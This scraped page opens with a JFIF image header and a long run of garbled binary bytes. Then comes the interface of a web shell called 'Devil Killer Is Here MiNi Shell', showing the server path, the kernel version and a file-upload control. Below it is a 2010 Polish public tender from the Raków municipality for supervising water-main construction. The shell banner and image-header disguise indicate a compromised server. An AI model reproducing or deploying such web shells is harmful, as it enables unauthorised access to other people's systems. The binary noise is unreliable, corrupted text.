JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101118/374456-N-2010.html

<p class="kh_header"><b>Raków: Pełnienie nadzoru inwestorskiego nad realizacją  zadania
pn. Budowa sieci wodociągowej   w Gminie Raków 
Etap II i III - Budowa wodociągu w miejscowościach Drogowle, Mędrów oraz Korzenno, Celiny, Smyków</b><br>
<b>Numer ogłoszenia: 374456 - 2010; data zamieszczenia: 18.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Raków , ul. Ogrodowa 1, 26-035 Raków, woj. świętokrzyskie, tel. 041 3535018, 3535030, faks 041 3535018, 3535030.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją  zadania
pn. Budowa sieci wodociągowej   w Gminie Raków 
Etap II i III - Budowa wodociągu w miejscowościach Drogowle, Mędrów oraz Korzenno, Celiny, Smyków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego zamówienia jest pełnienie nadzoru inwestorskiego nad realizacją zadania pn. Budowa sieci wodociągowej w Gminie Raków 
Etap II i III - Budowa wodociągu w miejscowościach Drogowle, Mędrów oraz Korzenno, Celiny, Smyków.
2.  Przedmiot zamówienia obejmuje wykonywanie nadzoru inwestorskiego nad całym procesem inwestycyjnym przez inspektorów nadzoru inwestorskiego  w specjalnościach: instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,   wentylacyjnych,  gazowych, wodociągowych i kanalizacyjnych, konstrukcyjno - budowlanej, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
3.Zakres robót budowlanych , dla których należy zapewnić nadzór obejmuje roboty budowlane polegające na budowie sieci wodociągowej o długości około 27 994,5 m wraz z przyłączami w ilości 240 szt. o długości około 4 542,00 m w miejscowościach: Drogowle, Mędrów oraz Korzenno, Celiny, Smyków, gm. Raków, budowa pompowni PK wraz zasilaniem energetycznym w miejscowości Drogowle, budowa zbiorników wyrównawczych ZB- 6 oraz pompowni HL wraz z zasilaniem energetycznym  w miejscowości Korzenno, gmina Raków.
Zakres robót obejmuje:
Drogowle - Mędrów
1) Wykonanie sieci wodociągowej w miejscowości Drogowle i Mędrów o długości 
około 11 502,5 m z materiałów:
- PE-HD PE 100 fi 250 x 14,8mm o długości około  80,0 m
-  PE-HD PE 100 fi 160 x 9,5 mm SDR 17 PN 10 o długości około 7 980,5 m
-  PE-HD PE 100 fi 125 x 7,4 mm SDR 17 PN 10 o długości około 1 131,5 m
-  PE-HD PE 100 fi 110x 6,6 mm SDR 17 PN 10 o długości około 1583,0 m
- PE-HD PE 100  fi  63 x 3,8 mm SDR 17 PN 10 o długości około 120,5 m
-  PE-HD PE 100 fi 50 x 3,0 mm SDR 17 PN 10 o długości około 255,5 m
- PE-HD PE 100 fi 40 x 2,4 mm SDR 17 PN 10 o długości około 351,5 m
- rury ochronne stalowe  fi  273,0/7,1 mm o długości około 163,0 m
-  rury ochronne stalowe  fi  219,1/6,7 mm o długości około 69,0 m
-  rury ochronne stalowe  fi  168,0/7,3 mm o długości około 87,0 m
-  rury ochronne stalowe  fi  114,3/4,0 mm o długości około 4,0 m
-  rury ochronne stalowe  fi  108,0/5,0 mm o długości około 97,0 m
- rura ochronna z PVC klasy S fi 110 x 3,2 mm o długości około 33,0 m
- rura ochronna z PVC klasy S fi 250 x 6,2 mm o długości około  10,0 m
- wodomierz sieciowy fi 160 mm - 1 szt.
- wodomierz sieciowy  fi 125 mm - 1 szt. 
2) wykonanie 93 szt. przyłączy o długości około 1986,0 m z materiałów:
- PE- HD PE 100  fi 63 x3,8 mm SDR17 PN 10 o długości około 32,5 m
- PE- HD PE 100  fi 50 x3,0 mm SDR17 PN 10 o długości około 65,5 m
- PE- HD PE 100  fi 40 x2,4 mm SDR17 PN 10 o długości około 1888,0 m
- rura ochronna z PVC klasy S fi 110 x 3,2 mm o długości około 6,0 m
- studnia wodomierzowa -  36 szt. 
3) Pompownia PK w miejscowości Drogowle wraz z zasilaniem energetycznym 
- zestaw hydroforowo- pompowy umieszczony będzie w kontenerze 
Korzenno - Celiny- Smyków
1)wykonanie sieci wodociągowej o długości około 16 492 m w tym:
- PE fi 63 mm o długości około 258  m
- PE fi 90 mm o długości około 1 606 m
- PE fi 110 mm o długości około 1 979 m
- PE fi 160 mm o długości około 12 649 m
2)Wykonanie przejść pod przeszkodami :
- przejścia w stalowych rurach ochronnych w ilości 57 szt. o długości ok. 665 m w tym:
- metodą przewiertu - 15 szt. o długości około 200 m
- metodą przekopu - 42 szt. o długości około 465 m
3)rury osłonowe PE na sieci i przyłączach w ilości 11 szt. o długości około 390 m
4)przewierty sterowane:
a) dla rur PE fi160 w rurze ochronnej PE fi 280 mm:
- pod rzeką Czarną Staszowską - 1 szt. o długości około 115 m
- pod drogą powiatową - 1 szt. o długości około 54 m
	b) dla rury PE fi 110 w rurze ochronnej PE fi 225 mm
pod rzeką Czarną Staszowską - 1 szt. o długości około115 m
5)rury dwudzielne  fi 110 - 15 szt. o długości około 45 m
6)wykonanie 147 szt. przyłączy wodociągowych o długości około 2.556 m oraz 32 szt. studzienek wodomierzowych
7)wykonanie  zbiorników wyrównawczych  ZB-6, Pompownia HL wraz z zasilaniem energetycznym:
- 2 zbiorniki żelbetowe o pojemności 2x150 m3, obsypane ziemią
- Pompownia HL w miejscowości Korzenno wraz z zasilaniem energetycznym 
 - zestaw hydroforowo- pompowy umieszczony będzie w kontenerze 
Zamawiający  dopuścił w specyfikacji istotnych warunków zamówienia na roboty budowlane oferowanie produktów, materiałów i urządzeń równoważnych opisywanym, z zastrzeżeniem, że gwarantują one realizację zamówienia zgodnie z opisem przedmiotu zamówienia i zapewniają uzyskanie parametrów technicznych, jakościowych i funkcjonalno - użytkowych nie gorszych od założonych. 

Opis inwestycji oraz szczegółowy zakres rzeczowy robót związanych z ich realizacją  określony  został w  dokumentacji projektowej oraz specyfikacjach technicznych  wykonania i odbioru robót,  - udostępnionych dla przetargu na realizację robót budowlanych dla w/w zadania  na stronie internetowej http://rakow.bip.jur.pl oraz w siedzibie Zamawiającego.
Z dokumentacją  w formie pisemnej można zapoznać się w Urzędzie Gminy Raków, 
ul. Ogrodowa  1, 26-035 Raków w dni robocze w godz. 800 - 1400 .

4.Inspektor Nadzoru jest przedstawicielem zamawiającego wobec wykonawcy robót budowlanych, w granicach posiadanego umocowania określonego w umowie. Inspektor
Nadzoru Inwestorskiego winien współpracować z zamawiającym zapewniając sprawną, zgodną z dokumentacją projektową i pozwoleniem na budowę obsługę realizacji zadania,jego odbioru, kontrolowanie rozliczeń budowy w tym sprawdzanie kompletności wszystkich dokumentów wykonawcy robót budowlanych przygotowywanych do odbioru końcowego i ich zgodności z dokumentacją projektową, potwierdzanie dokumentów zamawiającego związanych z pozyskaniem i rozliczeniem środków finansowych na realizację zadania.

5.Zakres działania Inspektora Nadzoru Inwestorskiego określa ustawa z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.), zgodnie z którą do  podstawowych obowiązków  inspektora nadzoru inwestorskiego należą:
- reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej;
- sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, 
a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych 
i niedopuszczonych do stosowania w budownictwie;
- sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych 
i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
- potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także na żądanie inwestora, kontrolowanie rozliczeń budowy.
Inspektor nadzoru inwestorskiego ma prawo:
- wydawać kierownikowi budowy lub kierownikowi robót polecenia , potwierdzone wpisem do dziennika budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
- żądać od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwe wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
6.Ponadto obowiązki Wykonawcy polegać będą na :
6.1.Wyegzekwowaniu od wykonawcy robót budowlanych obowiązku umieszczenia tablic informacyjnych budowlanych i unijnych na placu budowy.
6.2. Udział w przekazaniu wykonawcy robót budowlanych placu budowy.
6.3. Nadzór nad Wykonawcą w zakresie terminowego i prawidłowego przygotowania wszelkich niezbędnych dokumentów dotyczących  zawiadomienia o zamierzonym terminie  rozpoczęcia robót właściwych organów wynikających z ustawy Prawo budowlane oraz innych organów zgodnie z wydanymi przez nie decyzjami, uzgodnieniami, opiniami itp., 
o których mowa w decyzjach o pozwoleniu na budowę.
6.4. Ogólnym nadzorze nad realizacją robót i ich finansowaniem zgodnie
z harmonogramem.
6.5. Sprawdzaniu posiadania przez kierownika budowy odpowiednich dokumentów atestów, 	świadectw jakości, wyników badań itp.) dotyczących dostarczonych elementów,materiałów, 	urządzeń i innych wyrobów oraz dokonania ich oceny jakości na placu budowy przed ich 	wbudowaniem.
6.6. Stałym uczestnictwie w naradach technicznych, problemowych i innych
organizowanych przez wszystkie strony procesu budowlanego.
6.7. Koordynacji robót prowadzonych we wszystkich branżach.
6.8. Podejmowaniu wszelkich  działań umożliwiających prawidłową realizację 	harmonogramu.
6.9. Prowadzeniu nadzoru technicznego nad realizacją robót zgodnie z Prawem
Budowlanym.
6.10.Udział w załatwianiu spraw spornych z miejscową ludnością oraz skarg
wynikających z realizowanych robót, w tym prowadzenie ewentualnych negocjacji w konfliktach z władzami samorządowymi i mieszkańcami.
6.11. Współdziałanie z projektantem w czasie trwania realizacji przedmiotu umowy
celem rozwiązywania bieżących problemów realizacyjnych, w tym sprawowanie nadzoru w zakresie ewentualnych zmian od zatwierdzonego projektu budowlanego oraz weryfikacja i zatwierdzanie oferowanych przez Wykonawcę materiałów, urządzeń równoważnych.
6.12. Przygotowywanie i przedstawianie do akceptacji Zamawiającego odpowiedzi na pytania, propozycje ze strony Wykonawcy w zakresie realizacji przedmiotu umowy.
6.13. Przejęciu od wykonawcy robót budowlanych harmonogramu przedstawiającego
cykl realizacji inwestycji.
6.14. Potwierdzanie faktycznie wykonanego zakresu robót jako podstaw do fakturowania zgodnie z postanowieniami umowy zawartej pomiędzy Zamawiającym a Wykonawcą robót budowlanych, a także akceptowaniu faktur, po uprzedniej kontroli prawidłowości zafakturowania wykonanych robót. Sprawdzaniu, potwierdzaniu faktur wystawionych przez wykonawcę robót, potwierdzających zgodność wykonania robót 
z protokołem odbioru.
6.15. Udział przy opracowaniu raportów, sprawozdań okresowych, wniosków o płatność.
6.16. Przeprowadzanie kontroli na placu budowy w takich odstępach czasu aby była
zapewniona skuteczność nadzoru nie rzadziej jednak niż dwa razy w tygodniu oraz na każde wezwanie kierownika budowy lub Zamawiającego, a w okresie gwarancji/rękojmi 	za wady co najmniej jeden raz w ciągu sześciu miesięcy, a w przypadku potrzeby na 	wezwanie Zamawiającego.
6.17. Uczestniczeniu przy przeprowadzaniu prób, pomiarów i sprawdzeń oraz przy rozruchu 	technologicznym wbudowanych maszyn, urządzeń itp.
6.18.Wykonywaniu czynności związanych z przygotowaniem zrealizowanej inwestycji
do odbioru, dokonaniem odbioru i przekazaniem inwestycji użytkownikowi
wskazanemu przez Zamawiającego.
6.19. W ramach czynności o których mowa w punkcie 6.18. Inspektor Nadzoru
Inwestorskiego zobowiązany jest w szczególności do: stwierdzenia gotowości do
odbioru elementów ulegających zakryciu oraz dokonanie odbiorów robót
budowlanych  od wykonawcy robót oraz przekazanie przedmiotu 	odbioru wskazanemu przez zamawiającego użytkownikowi; nadzór na wykonawcą robót w zakresie 	powiadomienia stosownych organów (zgodnie z właściwością wynikającą z przepisów 	szczególnych) o zakończeniu budowy i uzyskaniu pozwolenia na użytkowanie obiektu.
6.20. Sprawowaniu nadzoru oraz weryfikacja dokumentacji powykonawczej 	(inwentaryzacja powykonawcza, atesty, próby, gwarancje jakości, analiza laboratoryjna wody, uzyskanie pozytywnego sprawozdania z badań wody stwierdzające że woda 	nadaje się do spożycia przez ludzi oraz innych dokumentów wymaganych przepisami prawa.), oraz opracowanie przez siebie oceny jakościowo - ilościowo - 	kosztowej 	inwestycji wraz z jej uzasadnieniem. W/w dokumentację inspektor zobowiązany jest 	potwierdzić własnoręcznym podpisem pieczęcią. 
6.21.Pomoc merytoryczna zamawiającemu z tytułu gwarancji/rękojmi za wady wykonanej inwestycji, dochodzeniu oraz egzekwowaniu od wykonawcy robót, z którym
zawarta była umowa, należnych odszkodowań lub kar umownych za nienależyte
lub nieterminowe wykonanie zobowiązań umownych.
6.22.Udział w pierwszym oraz kolejnych przeglądach w okresie gwarancji/rękojmi za wady Z przeprowadzonego przeglądu Inspektor Nadzoru Inwestorskiego sporządzi
protokół, w którym wyszczególni ewentualne wady i usterki, określi termin ich
usunięcia, oraz zapewni stosowny nadzór nad robotami.
6.23. Stałej konsultacji i doradztwie fachowym na rzecz zamawiającego aż do chwili rozliczenia finansowego projektu z Instytucją Zarządzającą RPOWŚ na lata 2007-2013.
6.24. Kontrola, weryfikacja i zatwierdzanie  kosztorysów powykonawczych do rozliczeń związanych z dofinansowaniem Z Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego.
6.25. Zakres prac, za które odpowiedzialny będzie inspektor nadzoru obejmuje także
przygotowanie i dostarczenie zamawiającemu wszelkich informacji związanych
z inwestycją, wymaganych przez Instytucję Zarządzającą RPOWŚ na lata 2007-2013.
6.26.Wyłoniony z przetargu wykonawca powinien w trakcie procesu budowlanego
podejmować także inne działania, nie wymienione w tym rozdziale, które
zabezpieczyłyby interes zamawiającego i przyczyniły się do prawidłowego wykonania i rozliczenia inwestycji.
Wspólny Słownik Zamówień (CPV):
71247000 - 1 - nadzór nad robotami budowlanymi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków 	udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, co najmniej 2 usług obejmujących pełnienie nadzoru inwestorskiego w zakresie budowy sieci wodociągowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże,że dysponuje 
 osobami zdolnymi do wykonania zamówienia  - odpowiedzialnymi za świadczenie usług, kontrolę jakości posiadającymi  uprawnienia:
- w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,   wentylacyjnych,  gazowych, wodociągowych i kanalizacyjnych
 -  w specjalności konstrukcyjno - budowlanej,
-  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków 	udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Za zgodą zamawiającego dopuszcza się możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy na podstawie art. 144 ust. 1 ustawy w przypadku wystąpienia poniższych okoliczności: 
a) W ściśle uzasadnionych przypadkach -  możliwych zdarzeniach losowych Zamawiający dopuszcza zmianę inspektora nadzoru inwestorskiego danej branży pod warunkiem, że Zamawiający zostanie powiadomiony na piśmie i wyrazi na taką zmianę zgodę, a następca będzie posiadał uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie  co najmniej jak poprzednik.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rakow.bip.jur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.rakow.bip.jur.pl oraz w budynku Urzędu Gminy Raków, ul. Ogrodowa 1, 26-035 Raków,pokój nr 25 w cenie 10 PLN..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2010 godzina 10:00, miejsce: Urząd Gminy w Rakowie, ul. Ogrodowa 1, 26-035 Raków sekretariat - pokój nr 14 
(I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




